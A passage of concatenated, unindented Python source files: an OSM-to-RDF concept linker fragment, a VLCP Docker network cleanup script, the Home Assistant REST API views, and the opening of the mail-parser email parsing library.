continue
for value in valueList:
self.printPercent(partInt=atPart, totalInt=totalParts, workingOn='Tag: ' + key + '=' + value)
self.createTag(key, keyConcept, value, tagScheme)
atPart = atPart + 1
def impliesToConcept(self):
for subject, obj in self.rdfGraph.getSubObjOSMImplies():
foundConcept = self.rdfGraph.getSubByPrefLabel(str(obj))
if foundConcept is not None:
self.rdfGraph.removeOSMImpliesLiteral(str(subject), str(obj))
self.rdfGraph.addOSMImpliesURIRef(str(subject), foundConcept)
def combinesToConcept(self):
for subject, obj in self.rdfGraph.getSubObjOSMCombines():
foundConcept = self.rdfGraph.getSubByPrefLabel(str(obj))
if foundConcept is not None:
self.rdfGraph.removeOSMCombinesLiteral(str(subject), str(obj))
self.rdfGraph.addOSMCombinesURIRef(str(subject), foundConcept)
def linksToConcept(self):
for subject, obj in self.rdfGraph.getSubObjOSMLinks():
foundConcept = self.rdfGraph.getSubByPrefLabel(str(obj))
if foundConcept is not None:
self.rdfGraph.removeOSMLinksLiteral(str(subject), str(obj))
self.rdfGraph.addOSMLinksURIRef(str(subject), foundConcept)
def osmLinksToConcept(self):
'''Traverse the rdfGraph and replaces OSM Wiki links literals (implies, combines, links)
to concepts of this rdfGraph, should they exists. Should be done once the rdfGraph
is created completly.'''
self.impliesToConcept()
self.combinesToConcept()
self.linksToConcept()
| |
'''
Created on 2016/11/3
:author: hubo
'''
from __future__ import print_function
from vlcp.config import manager
from vlcp.scripts.script import ScriptModule
import vlcp.service.sdn.viperflow as viperflow
import vlcp.service.kvdb.objectdb as objectdb
from vlcp.server.module import depend, call_api
from vlcp.utils.connector import TaskPool
from vlcp.protocol.http import Http, HttpConnectionStateEvent
import subprocess
from time import sleep
import sys
from vlcp_docker.dockerplugin import _unplug_ovs, _delete_veth
import os
import os.path
from vlcp.event.connection import Client
from vlcp.event.stream import MemoryStream
import json
import vlcp.utils.encoders as encoders
from vlcp.event.event import M_
try:
from shlex import quote as shell_quote
except:
from pipes import quote as shell_quote
import itertools
_find_invalid_ovs = '''#/bin/bash
%s find interface error!=[] | grep name | grep %s | grep -oP '".*"' | awk '{print substr($1, 2, length($1) - 2)}'
'''
_find_unused_veth = '''#/bin/bash
%s link show | grep '\-tap@'%s | awk '{print $2}' | grep -oP '.*\-tap'
'''
def _bytes(s, encoding = 'ascii'):
if isinstance(s, str):
return s.encode(encoding)
else:
return s
def _str(s, encoding = 'utf-8'):
if not isinstance(s, str):
return s.decode(encoding)
else:
return s
@depend(viperflow.ViperFlow, objectdb.ObjectDB)
class Cleanup(ScriptModule):
'''
Clean up unreleased veth devices, delete unreleased logical ports. Comparing current logical ports
with docker API result
cleanup.py -f <configfile> [-H <endpoint>] [--skipovs] [--skipiplink] [--skiplogicalport] [--nodockerinfo]
-H or --host: specify docker API endpoint
--skipovs: do not remove invalid ports from OpenvSwitch
--skipiplink: do not remove extra veth devices
--skiplogicalport: do not remove unreleased logical ports
--nodockerinfo: do not detect docker info, always delete logical ports
'''
options = (('skipovs', None, False),
('skipiplink', None, False),
('skiplogicalport', None, False),
('host', 'H', True)
)
async def run(self, host = None, skipovs = None, skipiplink = None, skiplogicalport = None):
skipovs = (skipovs is not None)
skipiplink = (skipiplink is not None)
skiplogicalport = (skiplogicalport is not None)
pool = TaskPool(self.scheduler)
pool.start()
if host is None:
host = os.environ.get('DOCKER_HOST', 'unix:///var/run/docker.sock')
enable_ssl = os.environ.get('DOCKER_TLS_VERIFY', '')
cert_root_path = os.environ.get('DOCKER_CERT_PATH', '~/.docker')
ca_path, cert_path, key_path = [os.path.join(cert_root_path, f) for f in ('ca.pem', 'cert.pem', 'key.pem')]
if '/' not in host:
if enable_ssl:
host = 'ssl://' + host
else:
host = 'tcp://' + host
self._docker_conn = None
http_protocol = Http(False)
http_protocol.defaultport = 2375
http_protocol.ssldefaultport = 2375
http_protocol.persist = False
def _create_docker_conn():
self._docker_conn = Client(host, http_protocol, self.scheduler, key_path, cert_path, ca_path)
self._docker_conn.start()
return self._docker_conn
async def call_docker_api(path, data = None, method = None):
if self._docker_conn is None or not self._docker_conn.connected:
_create_docker_conn()
conn_up = HttpConnectionStateEvent.createMatcher(HttpConnectionStateEvent.CLIENT_CONNECTED)
conn_noconn = HttpConnectionStateEvent.createMatcher(HttpConnectionStateEvent.CLIENT_NOTCONNECTED)
_, m = await M_(conn_up, conn_noconn)
if m is conn_noconn:
raise IOError('Cannot connect to docker API endpoint: ' + repr(host))
if method is None:
if data is None:
method = b'GET'
else:
method = b'POST'
if data is None:
final_resp, _ = await http_protocol.request_with_response(
self.apiroutine,
self._docker_conn,
b'docker',
_bytes(path),
method,
[(b'Accept-Encoding', b'gzip, deflate')]
)
else:
final_resp, _ = await http_protocol.request_with_response(
self.apiroutine,
self._docker_conn,
b'docker',
_bytes(path),
method,
[(b'Content-Type', b'application/json;charset=utf-8'),
(b'Accept-Encoding', b'gzip, deflate')],
MemoryStream(_bytes(json.dumps(data))))
output_stream = final_resp.stream
try:
if final_resp.statuscode >= 200 and final_resp.statuscode < 300:
if output_stream is not None and b'content-encoding' in final_resp.headerdict:
ce = final_resp.headerdict.get(b'content-encoding')
if ce.lower() == b'gzip' or ce.lower() == b'x-gzip':
output_stream.getEncoderList().append(encoders.gzip_decoder())
elif ce.lower() == b'deflate':
output_stream.getEncoderList().append(encoders.deflate_decoder())
if output_stream is None:
return {}
else:
data = await output_stream.read(self.apiroutine)
return json.loads(data.decode('utf-8'))
else:
raise ValueError('Docker API returns error status: ' + repr(final_resp.status))
finally:
if output_stream is not None:
output_stream.close(self.scheduler)
async def execute_bash(script, ignoreerror = True):
def task():
try:
sp = subprocess.Popen(['bash'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outdata, errdata = sp.communicate(_bytes(script))
sys.stderr.write(_str(errdata))
errno = sp.poll()
if errno != 0 and not ignoreerror:
print('Script failed, output:\n', repr(outdata), file=sys.stderr)
raise ValueError('Script returns %d' % (errno,))
else:
return _str(outdata)
finally:
if sp.poll() is None:
try:
sp.terminate()
sleep(2)
if sp.poll() is None:
sp.kill()
except Exception:
pass
return await pool.run_task(self.apiroutine, task)
ovsbridge = manager.get('module.dockerplugin.ovsbridge', 'dockerbr0')
vethprefix = manager.get('module.dockerplugin.vethprefix', 'vlcp')
ipcommand = manager.get('module.dockerplugin.ipcommand', 'ip')
ovscommand = manager.get('module.dockerplugin.ovscommand', 'ovs-vsctl')
find_invalid_ovs = _find_invalid_ovs % (shell_quote(ovscommand), shell_quote(vethprefix))
find_unused_veth = _find_unused_veth % (shell_quote(ipcommand), shell_quote(vethprefix))
print("docker API endpoint: ", host)
print("ovsbridge: ", ovsbridge)
print("vethprefix: ", vethprefix)
async def invalid_ovs_ports():
result = await execute_bash(find_invalid_ovs)
first_invalid_ovs_list = result.splitlines(False)
first_invalid_ovs_list = [k.strip() for k in first_invalid_ovs_list if k.strip()]
if first_invalid_ovs_list:
print("Detect %d invalid ports from OpenvSwitch, wait 5 seconds to detect again..." % (len(first_invalid_ovs_list),))
else:
return []
await self.apiroutine.wait_with_timeout(5)
result = await execute_bash(find_invalid_ovs)
second_invalid_ovs_list = result.splitlines(False)
second_invalid_ovs_list = [k.strip() for k in second_invalid_ovs_list if k.strip()]
invalid_ports = list(set(first_invalid_ovs_list).intersection(second_invalid_ovs_list))
if invalid_ports:
print('Detect %d invalid ports from intersection of two tries, removing...' % (len(invalid_ports),))
# Remove these ports
def _remove_ports():
for p in invalid_ports:
try:
_unplug_ovs(ovscommand, ovsbridge, p[:-len('-tag')])
except Exception as exc:
print('Remove port %r failed: %s' % (p, exc))
await pool.run_task(self.apiroutine, _remove_ports)
return invalid_ports
async def remove_unused_ports():
result = await execute_bash(find_unused_veth)
first_unused_ports = result.splitlines(False)
first_unused_ports = [k.strip() for k in first_unused_ports if k.strip()]
if first_unused_ports:
print("Detect %d unused ports from ip-link, wait 5 seconds to detect again..." % (len(first_unused_ports),))
else:
return []
await self.apiroutine.wait_with_timeout(5)
result = await execute_bash(find_unused_veth)
second_unused_ports = result.splitlines(False)
second_unused_ports = [k.strip() for k in second_unused_ports if k.strip()]
unused_ports = list(set(first_unused_ports).intersection(second_unused_ports))
if unused_ports:
print('Detect %d unused ports from intersection of two tries, removing...' % (len(unused_ports),))
# Remove these ports
def _remove_ports():
for p in unused_ports:
try:
_unplug_ovs(ovscommand, ovsbridge, p[:-len('-tag')])
except Exception as exc:
print('Remove port %r from OpenvSwitch failed: %s' % (p, exc))
try:
_delete_veth(ipcommand, p[:-len('-tag')])
except Exception as exc:
print('Delete port %r with ip-link failed: %s' % (p, exc))
await pool.run_task(self.apiroutine, _remove_ports)
return unused_ports
async def detect_unused_logports():
# docker network ls
print("Check logical ports from docker API...")
result = await call_docker_api(br'/v1.24/networks?filters={"driver":["vlcp"]}')
network_ports = dict((n['Id'], dict((p['EndpointID'], p['IPv4Address'])
for p in n['Containers'].values()))
for n in result
if n['Driver'] == 'vlcp') # Old version of docker API does not support filter by driver
print("Find %d networks and %d endpoints from docker API, recheck in 5 seconds..." % \
(len(network_ports), sum(len(ports) for ports in network_ports.values())))
async def recheck_ports():
await self.apiroutine.wait_with_timeout(5)
# docker network inspect, use this for cross check
result = await call_docker_api(br'/v1.24/networks?filters={"driver":["vlcp"]}')
second_network_ports = dict((n['Id'], dict((p['EndpointID'], p['IPv4Address'])
for p in n['Containers'].values()))
for n in result
if n['Id'] in network_ports and n['Driver'] == 'vlcp')
for nid in network_ports:
if nid not in second_network_ports:
print('WARNING: network {} may be removed.'.format(nid))
second_network_ports[nid] = {}
print("Recheck find %d endpoints from docker API" % \
(sum(len(ports) for ports in second_network_ports.values()),))
return second_network_ports
async def check_viperflow():
first_vp_ports = {}
for nid in network_ports:
result = await call_api(self.apiroutine, 'viperflow', 'listlogicalports',
{'logicalnetwork': 'docker-' + nid + '-lognet'})
first_vp_ports[nid] = dict((p['id'], p.get('ip_address'))
for p in result
if p['id'].startswith('docker-'))
print("Find %d endpoints from viperflow database, recheck in 5 seconds..." % \
(sum(len(ports) for ports in first_vp_ports.values()),))
await self.apiroutine.wait_with_timeout(5)
second_vp_ports = {}
for nid in network_ports:
result = await call_api(self.apiroutine, 'viperflow', 'listlogicalports',
{'logicalnetwork': 'docker-' + nid + '-lognet'})
second_vp_ports[nid] = dict((p['id'], p.get('ip_address'))
for p in result
if p['id'] in first_vp_ports[nid])
print("Find %d endpoints from viperflow database from the intersection of two tries" % \
(sum(len(ports) for ports in second_vp_ports.values()),))
second_vp_ports = dict((nid, dict((pid[len('docker-'):], addr)
for pid, addr in v.items()))
for nid, v in second_vp_ports.items())
return second_vp_ports
second_vp_ports = await check_viperflow()
second_ports = await recheck_ports()
unused_logports = dict((nid, dict((pid, addr)
for pid, addr in v.items()
if pid not in network_ports[nid] and\
pid not in second_ports[nid]))
for nid, v in second_vp_ports.items())
return unused_logports
routines = []
if not skipovs:
routines.append(invalid_ovs_ports())
if not skipiplink:
routines.append(remove_unused_ports())
if not skiplogicalport:
routines.append(detect_unused_logports())
execute_result = await self.apiroutine.execute_all(routines)
if skiplogicalport:
return
unused_logports = execute_result[-1]
if any(ports for ports in unused_logports.values()):
print("Find %d unused logical ports, first 20 ips:\n%r" % \
(sum(len(ports) for ports in unused_logports.values()),
[v for _,v in \
itertools.takewhile(lambda x: x[0] <= 20,
enumerate(addr for ports in unused_logports.values()
for addr in ports.values()))]))
print("Will remove them in 5 seconds, press Ctrl+C to cancel...")
await self.apiroutine.wait_with_timeout(5)
for ports in unused_logports.values():
for p, addr in ports.items():
try:
await call_api(self.apiroutine, 'viperflow', 'deletelogicalport',
{'id': 'docker-' + p})
except Exception as exc:
print("WARNING: remove logical port %r (IP: %s) failed, maybe it is already removed. Message: %s" % \
(p, addr, exc))
print("Done.")
if __name__ == '__main__':
Cleanup.main()
| |
"""Rest API for Home Assistant."""
import asyncio
from http import HTTPStatus
import json
import logging
from aiohttp import web
from aiohttp.web_exceptions import HTTPBadRequest
import async_timeout
import voluptuous as vol
from homeassistant.auth.permissions.const import POLICY_READ
from homeassistant.bootstrap import DATA_LOGGING
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP,
EVENT_TIME_CHANGED,
MATCH_ALL,
URL_API,
URL_API_COMPONENTS,
URL_API_CONFIG,
URL_API_DISCOVERY_INFO,
URL_API_ERROR_LOG,
URL_API_EVENTS,
URL_API_SERVICES,
URL_API_STATES,
URL_API_STREAM,
URL_API_TEMPLATE,
)
import homeassistant.core as ha
from homeassistant.exceptions import ServiceNotFound, TemplateError, Unauthorized
from homeassistant.helpers import template
from homeassistant.helpers.json import JSONEncoder
from homeassistant.helpers.service import async_get_all_descriptions
_LOGGER = logging.getLogger(__name__)
ATTR_BASE_URL = "base_url"
ATTR_EXTERNAL_URL = "external_url"
ATTR_INTERNAL_URL = "internal_url"
ATTR_LOCATION_NAME = "location_name"
ATTR_INSTALLATION_TYPE = "installation_type"
ATTR_REQUIRES_API_PASSWORD = "requires_api_password"
ATTR_UUID = "uuid"
ATTR_VERSION = "version"
DOMAIN = "api"
STREAM_PING_PAYLOAD = "ping"
STREAM_PING_INTERVAL = 50 # seconds
async def async_setup(hass, config):
"""Register the API with the HTTP interface."""
hass.http.register_view(APIStatusView)
hass.http.register_view(APIEventStream)
hass.http.register_view(APIConfigView)
hass.http.register_view(APIDiscoveryView)
hass.http.register_view(APIStatesView)
hass.http.register_view(APIEntityStateView)
hass.http.register_view(APIEventListenersView)
hass.http.register_view(APIEventView)
hass.http.register_view(APIServicesView)
hass.http.register_view(APIDomainServicesView)
hass.http.register_view(APIComponentsView)
hass.http.register_view(APITemplateView)
if DATA_LOGGING in hass.data:
hass.http.register_view(APIErrorLog)
return True
class APIStatusView(HomeAssistantView):
"""View to handle Status requests."""
url = URL_API
name = "api:status"
@ha.callback
def get(self, request):
"""Retrieve if API is running."""
return self.json_message("API running.")
class APIEventStream(HomeAssistantView):
"""View to handle EventStream requests."""
url = URL_API_STREAM
name = "api:stream"
async def get(self, request):
"""Provide a streaming interface for the event bus."""
# pylint: disable=no-self-use
if not request["hass_user"].is_admin:
raise Unauthorized()
hass = request.app["hass"]
stop_obj = object()
to_write = asyncio.Queue()
if restrict := request.query.get("restrict"):
restrict = restrict.split(",") + [EVENT_HOMEASSISTANT_STOP]
async def forward_events(event):
"""Forward events to the open request."""
if event.event_type == EVENT_TIME_CHANGED:
return
if restrict and event.event_type not in restrict:
return
_LOGGER.debug("STREAM %s FORWARDING %s", id(stop_obj), event)
if event.event_type == EVENT_HOMEASSISTANT_STOP:
data = stop_obj
else:
data = json.dumps(event, cls=JSONEncoder)
await to_write.put(data)
response = web.StreamResponse()
response.content_type = "text/event-stream"
await response.prepare(request)
unsub_stream = hass.bus.async_listen(MATCH_ALL, forward_events)
try:
_LOGGER.debug("STREAM %s ATTACHED", id(stop_obj))
# Fire off one message so browsers fire open event right away
await to_write.put(STREAM_PING_PAYLOAD)
while True:
try:
async with async_timeout.timeout(STREAM_PING_INTERVAL):
payload = await to_write.get()
if payload is stop_obj:
break
msg = f"data: {payload}\n\n"
_LOGGER.debug("STREAM %s WRITING %s", id(stop_obj), msg.strip())
await response.write(msg.encode("UTF-8"))
except asyncio.TimeoutError:
await to_write.put(STREAM_PING_PAYLOAD)
except asyncio.CancelledError:
_LOGGER.debug("STREAM %s ABORT", id(stop_obj))
finally:
_LOGGER.debug("STREAM %s RESPONSE CLOSED", id(stop_obj))
unsub_stream()
return response
class APIConfigView(HomeAssistantView):
"""View to handle Configuration requests."""
url = URL_API_CONFIG
name = "api:config"
@ha.callback
def get(self, request):
"""Get current configuration."""
return self.json(request.app["hass"].config.as_dict())
class APIDiscoveryView(HomeAssistantView):
"""
View to provide Discovery information.
DEPRECATED: To be removed in 2022.1
"""
requires_auth = False
url = URL_API_DISCOVERY_INFO
name = "api:discovery"
async def get(self, request):
"""Get discovery information."""
return self.json(
{
ATTR_UUID: "",
ATTR_BASE_URL: "",
ATTR_EXTERNAL_URL: "",
ATTR_INTERNAL_URL: "",
ATTR_LOCATION_NAME: "",
ATTR_INSTALLATION_TYPE: "",
ATTR_REQUIRES_API_PASSWORD: True,
ATTR_VERSION: "",
}
)
class APIStatesView(HomeAssistantView):
"""View to handle States requests."""
url = URL_API_STATES
name = "api:states"
@ha.callback
def get(self, request):
"""Get current states."""
user = request["hass_user"]
entity_perm = user.permissions.check_entity
states = [
state
for state in request.app["hass"].states.async_all()
if entity_perm(state.entity_id, "read")
]
return self.json(states)
class APIEntityStateView(HomeAssistantView):
"""View to handle EntityState requests."""
url = "/api/states/{entity_id}"
name = "api:entity-state"
@ha.callback
def get(self, request, entity_id):
"""Retrieve state of entity."""
user = request["hass_user"]
if not user.permissions.check_entity(entity_id, POLICY_READ):
raise Unauthorized(entity_id=entity_id)
if state := request.app["hass"].states.get(entity_id):
return self.json(state)
return self.json_message("Entity not found.", HTTPStatus.NOT_FOUND)
async def post(self, request, entity_id):
"""Update state of entity."""
if not request["hass_user"].is_admin:
raise Unauthorized(entity_id=entity_id)
hass = request.app["hass"]
try:
data = await request.json()
except ValueError:
return self.json_message("Invalid JSON specified.", HTTPStatus.BAD_REQUEST)
if (new_state := data.get("state")) is None:
return self.json_message("No state specified.", HTTPStatus.BAD_REQUEST)
attributes = data.get("attributes")
force_update = data.get("force_update", False)
is_new_state = hass.states.get(entity_id) is None
# Write state
hass.states.async_set(
entity_id, new_state, attributes, force_update, self.context(request)
)
# Read the state back for our response
status_code = HTTPStatus.CREATED if is_new_state else HTTPStatus.OK
resp = self.json(hass.states.get(entity_id), status_code)
resp.headers.add("Location", f"/api/states/{entity_id}")
return resp
@ha.callback
def delete(self, request, entity_id):
"""Remove entity."""
if not request["hass_user"].is_admin:
raise Unauthorized(entity_id=entity_id)
if request.app["hass"].states.async_remove(entity_id):
return self.json_message("Entity removed.")
return self.json_message("Entity not found.", HTTPStatus.NOT_FOUND)
class APIEventListenersView(HomeAssistantView):
"""View to handle EventListeners requests."""
url = URL_API_EVENTS
name = "api:event-listeners"
@ha.callback
def get(self, request):
"""Get event listeners."""
return self.json(async_events_json(request.app["hass"]))
class APIEventView(HomeAssistantView):
"""View to handle Event requests."""
url = "/api/events/{event_type}"
name = "api:event"
async def post(self, request, event_type):
"""Fire events."""
if not request["hass_user"].is_admin:
raise Unauthorized()
body = await request.text()
try:
event_data = json.loads(body) if body else None
except ValueError:
return self.json_message(
"Event data should be valid JSON.", HTTPStatus.BAD_REQUEST
)
if event_data is not None and not isinstance(event_data, dict):
return self.json_message(
"Event data should be a JSON object", HTTPStatus.BAD_REQUEST
)
# Special case handling for event STATE_CHANGED
# We will try to convert state dicts back to State objects
if event_type == ha.EVENT_STATE_CHANGED and event_data:
for key in ("old_state", "new_state"):
state = ha.State.from_dict(event_data.get(key))
if state:
event_data[key] = state
request.app["hass"].bus.async_fire(
event_type, event_data, ha.EventOrigin.remote, self.context(request)
)
return self.json_message(f"Event {event_type} fired.")
class APIServicesView(HomeAssistantView):
"""View to handle Services requests."""
url = URL_API_SERVICES
name = "api:services"
async def get(self, request):
"""Get registered services."""
services = await async_services_json(request.app["hass"])
return self.json(services)
class APIDomainServicesView(HomeAssistantView):
"""View to handle DomainServices requests."""
url = "/api/services/{domain}/{service}"
name = "api:domain-services"
async def post(self, request, domain, service):
"""Call a service.
Returns a list of changed states.
"""
hass: ha.HomeAssistant = request.app["hass"]
body = await request.text()
try:
data = json.loads(body) if body else None
except ValueError:
return self.json_message(
"Data should be valid JSON.", HTTPStatus.BAD_REQUEST
)
context = self.context(request)
try:
await hass.services.async_call(
domain, service, data, blocking=True, context=context
)
except (vol.Invalid, ServiceNotFound) as ex:
raise HTTPBadRequest() from ex
changed_states = []
for state in hass.states.async_all():
if state.context is context:
changed_states.append(state)
return self.json(changed_states)
class APIComponentsView(HomeAssistantView):
"""View to handle Components requests."""
url = URL_API_COMPONENTS
name = "api:components"
@ha.callback
def get(self, request):
"""Get current loaded components."""
return self.json(request.app["hass"].config.components)
class APITemplateView(HomeAssistantView):
"""View to handle Template requests."""
url = URL_API_TEMPLATE
name = "api:template"
async def post(self, request):
"""Render a template."""
if not request["hass_user"].is_admin:
raise Unauthorized()
try:
data = await request.json()
tpl = template.Template(data["template"], request.app["hass"])
return tpl.async_render(variables=data.get("variables"), parse_result=False)
except (ValueError, TemplateError) as ex:
return self.json_message(
f"Error rendering template: {ex}", HTTPStatus.BAD_REQUEST
)
class APIErrorLog(HomeAssistantView):
"""View to fetch the API error log."""
url = URL_API_ERROR_LOG
name = "api:error_log"
async def get(self, request):
"""Retrieve API error log."""
# pylint: disable=no-self-use
if not request["hass_user"].is_admin:
raise Unauthorized()
return web.FileResponse(request.app["hass"].data[DATA_LOGGING])
async def async_services_json(hass):
"""Generate services data to JSONify."""
descriptions = await async_get_all_descriptions(hass)
return [{"domain": key, "services": value} for key, value in descriptions.items()]
@ha.callback
def async_events_json(hass):
"""Generate event data to JSONify."""
return [
{"event": key, "listener_count": value}
for key, value in hass.bus.async_listeners().items()
]
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2016 Fedele Mantuano (https://twitter.com/fedelemantuano)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import unicode_literals
import base64
import email
import logging
import os
import ipaddress
import six
import simplejson as json
from .const import (
ADDRESSES_HEADERS,
EPILOGUE_DEFECTS,
REGXIP)
from .utils import (
convert_mail_date,
decode_header_part,
find_between,
get_header,
get_mail_keys,
get_to_domains,
msgconvert,
ported_open,
ported_string,
random_string,
receiveds_parsing,
write_attachments,
)
from .exceptions import MailParserEnvironmentError
log = logging.getLogger(__name__)
def parse_from_file_obj(fp):
"""
Parsing email from a file-like object.
Args:
fp (file-like object): file-like object of raw email
Returns:
Instance of MailParser with raw email parsed
"""
return MailParser.from_file_obj(fp)
def parse_from_file(fp):
"""
Parsing email from file.
Args:
fp (string): file path of raw email
Returns:
Instance of MailParser with raw email parsed
"""
return MailParser.from_file(fp)
def parse_from_file_msg(fp):
"""
Parsing email from file Outlook msg.
Args:
fp (string): file path of raw Outlook email
Returns:
Instance of MailParser with raw email parsed
"""
return MailParser.from_file_msg(fp)
def parse_from_string(s):
"""
Parsing email from string.
Args:
s (string): raw email
Returns:
Instance of MailParser with raw email parsed
"""
return MailParser.from_string(s)
def parse_from_bytes(bt):
"""
Parsing email from bytes. Only for Python 3
Args:
bt (bytes-like object): raw email as bytes-like object
Returns:
Instance of MailParser with raw email parsed
"""
return MailParser.from_bytes(bt)
class MailParser(object):
"""
MailParser package provides a standard parser that understands
most email document structures like official email package.
MailParser handles the encoding of email and split the raw email for you.
Headers:
https://www.iana.org/assignments/message-headers/message-headers.xhtml
"""
def __init__(self, message=None):
"""
Init a new object from a message object structure.
"""
self._message = message
log.debug(
"All headers of emails: {}".format(", ".join(message.keys())))
self.parse()
def __str__(self):
if self.message:
return self.subject
else:
return six.text_type()
@classmethod
def from_file_obj(cls, fp):
"""
Init a new object from a file-like object.
Not for Outlook msg.
Args:
fp (file-like object): file-like object of raw email
Returns:
Instance of MailParser
"""
log.debug("Parsing email from file object")
try:
fp.seek(0)
except IOError:
# When stdout is a TTY it's a character device
# and it's not seekable, you cannot seek in a TTY.
pass
finally:
s = fp.read()
return cls.from_string(s)
@classmethod
def from_file(cls, fp, is_outlook=False):
"""
Init a new object from a file path.
Args:
fp (string): file path of raw email
is_outlook (boolean): if True is an Outlook email
Returns:
Instance of MailParser
"""
log.debug("Parsing email from file {!r}".format(fp))
with ported_open(fp) as f:
message = email.message_from_file(f)
if is_outlook:
log.debug("Removing temp converted Outlook email {!r}".format(fp))
os.remove(fp)
return cls(message)
@classmethod
def from_file_msg(cls, fp):
"""
Init a new object from a Outlook message file,
mime type: application/vnd.ms-outlook
Args:
fp (string): file path of raw Outlook email
Returns:
Instance of MailParser
"""
log.debug("Parsing email from file Outlook")
f, _ = msgconvert(fp)
return cls.from_file(f, True)
@classmethod
def from_string(cls, s):
"""
Init a new object from a string.
Args:
s (string): raw email
Returns:
Instance of MailParser
"""
log.debug("Parsing email from string")
message = email.message_from_string(s)
return cls(message)
@classmethod
def from_bytes(cls, bt):
"""
Init a new object from bytes.
Args:
bt (bytes-like object): raw email as bytes-like object
Returns:
Instance of MailParser
"""
log.debug("Parsing email from bytes")
if six.PY2:
raise MailParserEnvironmentError(
"Parsing from bytes is valid only for Python 3.x version")
message = email.message_from_bytes(bt)
return cls(message)
def _reset(self):
"""
Reset the state of mail object.
"""
log.debug("Reset all variables")
self._attachments = []
self._text_plain = []
self._text_html = []
self._text_not_managed = []
self._defects = []
self._defects_categories = set()
self._has_defects = False
def _append_defects(self, part, part_content_type):
"""
Add new defects and defects categories to object attributes.
The defects are a list of all the problems found
when parsing this message.
Args:
part (string): mail part
part_content_type (string): content type of part
"""
part_defects = {}
for e in part.defects:
defects = "{}: {}".format(e.__class__.__name__, e.__doc__)
self._defects_categories.add(e.__class__.__name__)
part_defects.setdefault(part_content_type, []).append(defects)
log.debug("Added defect {!r}".format(defects))
# Tag mail with defect
if part_defects:
self._has_defects = True
# Save all defects
self._defects.append(part_defects)
def _make_mail(self, complete=True):
"""
This method assigns the right values to all tokens of email.
Returns a parsed object
Keyword Arguments:
complete {bool} -- If True returns all mails parts
(default: {True})
Returns:
dict -- Parsed email object
"""
mail = {}
keys = get_mail_keys(self.message, complete)
for i in keys:
log.debug("Getting header or part {!r}".format(i))
value = getattr(self, i)
if value:
mail[i] = value
# add defects
mail["has_defects"] = self.has_defects
if self.has_defects:
mail["defects"] = self.defects
mail["defects_categories"] = list(self.defects_categories)
return mail
def parse(self):
"""
This method parses the raw email and makes the tokens.
Returns:
Instance of MailParser with raw email parsed
"""
if not self.message:
return self
# reset and start parsing
self._reset()
parts = [] # Normal parts plus defects
# walk all mail parts to search defects
for p in self.message.walk():
part_content_type = p.get_content_type()
self._append_defects(p, part_content_type)
parts.append(p)
# If defects are in epilogue defects get epilogue
if self.defects_categories & EPILOGUE_DEFECTS:
log.debug("Found defects in emails")
epilogue = find_between(
self.message.epilogue,
"{}".format("--" + self.message.get_boundary()),
"{}".format("--" + self.message.get_boundary() + "--"))
try:
p = email.message_from_string(epilogue)
parts.append(p)
except TypeError:
log.debug("Failed to get epilogue part for TypeError")
except Exception:
log.error("Failed to get epilogue part. Check raw mail.")
# walk all mail parts
for i, p in enumerate(parts):
if not p.is_multipart():
charset = p.get_content_charset('utf-8')
charset_raw = p.get_content_charset()
log.debug("Charset {!r} part {!r}".format(charset, i))
content_disposition = ported_string(
p.get('content-disposition'))
log.debug("content-disposition {!r} part {!r}".format(
content_disposition, i))
content_id = ported_string(p.get('content-id'))
log.debug("content-id {!r} part {!r}".format(
content_id, i))
content_subtype = ported_string(p.get_content_subtype())
log.debug("content subtype {!r} part {!r}".format(
content_subtype, i))
filename = decode_header_part(p.get_filename())
is_attachment = False
if filename:
is_attachment = True
else:
if content_id and content_subtype not in ('html', 'plain'):
is_attachment = True
filename = content_id
elif content_subtype in ('rtf'):
is_attachment = True
filename = "{}.rtf".format(random_string())
# this is an attachment
if is_attachment:
log.debug("Email part {!r} is an attachment".format(i))
log.debug("Filename {!r} part {!r}".format(filename, i))
binary = False
mail_content_type = ported_string(p.get_content_type())
log.debug("Mail content type {!r} part {!r}".format(
mail_content_type, i))
transfer_encoding = ported_string(
p.get('content-transfer-encoding', '')).lower()
log.debug("Transfer encoding {!r} part {!r}".format(
transfer_encoding, i))
content_disposition = ported_string(
p.get('content-disposition'))
log.debug("content-disposition {!r} part {!r}".format(
content_disposition, i))
if transfer_encoding == "base64" or (
transfer_encoding == "quoted-\
printable" and "application" in mail_content_type):
payload = p.get_payload(decode=False)
binary = True
log.debug("Filename {!r} part {!r} is binary".format(
filename, i))
elif "uuencode" in transfer_encoding:
# Re-encode in base64
payload = base64.b64encode(
p.get_payload(decode=True)).decode('ascii')
binary = True
transfer_encoding = "base64"
log.debug("Filename {!r} part {!r} is binary (uuencode"
" re-encoded to base64)".format(filename, i))
else:
payload = ported_string(
p.get_payload(decode=True), encoding=charset)
log.debug(
"Filename {!r} part {!r} is not binary".format(
filename, i))
self._attachments.append({
"filename": filename,
"payload": payload,
"binary": binary,
"mail_content_type": mail_content_type,
"content-id": content_id,
"content-disposition": content_disposition,
"charset": charset_raw,
"content_transfer_encoding": transfer_encoding})
# this isn't an attachments
else:
log.debug("Email part {!r} is not an attachment".format(i))
# Get the payload using get_payload method with decode=True
# As Python truly decodes only 'base64',
# 'quoted-printable', 'x-uuencode',
# 'uuencode', 'uue', 'x-uue'
# And for other encodings it breaks the characters so
# we need to decode them with encoding python is appying
# To maintain the characters
payload = p.get_payload(decode=True)
cte = p.get('Content-Transfer-Encoding')
if cte:
cte = cte.lower()
if not cte or cte in ['7bit', '8bit']:
payload = payload.decode('raw-unicode-escape')
else:
payload = ported_string(payload, encoding=charset)
if payload:
if p.get_content_subtype() == 'html':
self._text_html.append(payload)
elif p.get_content_subtype() == 'plain':
self._text_plain.append(payload)
else:
log.warning(
'Email content {!r} not handled'.format(
p.get_content_subtype()))
self._text_not_managed.append(payload)
else:
# Parsed object mail with all parts
self._mail = self._make_mail()
# Parsed object mail with mains parts
self._mail_partial = self._make_mail(complete=False)
def get_server_ipaddress(self, trust):
"""
Return the ip address of sender
Overview:
Extract a reliable sender IP address heuristically for each message.
Although the message format dictates a chain of relaying IP
